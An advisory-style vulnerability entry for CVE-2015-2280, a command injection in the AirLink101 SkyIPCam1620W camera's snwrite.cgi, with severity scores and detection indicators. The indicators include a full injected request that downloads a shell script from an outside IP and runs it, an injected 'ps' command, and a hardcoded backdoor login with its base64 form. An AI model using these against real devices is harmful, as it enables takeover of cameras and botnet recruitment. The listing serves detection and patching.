CVE-2015-2280
published 2017-07-25

Priority: P1 80 high
CVSS 3.0: 8.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Flags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 16.99% (96.7th percentile)
snwrite.cgi in AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the mac parameter.

Affected (1 range)

Vendor: airlink101
Product: skyipcam1620w_wireless_n_mpeg4_3gpp_firmware
Version range: (none listed)
Fixed in: (none listed)

Detection & IOCs (extracted from sources)

url: /maker/snwrite.cgi?mac=1234;wget%20 http:// 89.46.223.70/airlink[.]sh %20-O%20/tmp/666trapgod;chmod%20777%20/tmp/666trapgod;./tmp/666trapgod
path: /maker/snwrite.cgi
path: /server/usr.ini
command: http:///maker/snwrite.cgi?mac=1234;ps
other: productmaker:ftvsbannedcode
other: admin:admin
path: /etc/init.d/macwrite.sh
  • RIFT botnet ELF payloads are packed with the UPX packer. Use UPX signature detection on binaries dropped to /tmp/.
  • The backdoor credential 'productmaker:ftvsbannedcode' (base64: cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl) grants access to /maker/snwrite.cgi. Alert on HTTP Basic Auth using this credential or the encoded string.
  • The vulnerable firmware version is FW_AIC1620W_1.1.0-12_20120709_r1192.pck. Inventory devices running this firmware version for prioritized patching and monitoring.
  • Exploitation of CVE-2015-2280 requires valid credentials; however, the hardcoded backdoor credentials ('productmaker:ftvsbannedcode') present in /server/usr.ini effectively make it unauthenticated in practice.
  • Other devices based on the same firmware as the AirLink101 SkyIPCam1620W are likely affected but were not tested by the researcher.

CVSS provenance

nvd, v3.0: 8.8 HIGH (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
nvd, v2.0: 9.0 CRITICAL (AV:N/AC:L/Au:S/C:C/I:C/A:C)
vulncheck: 8.8 HIGH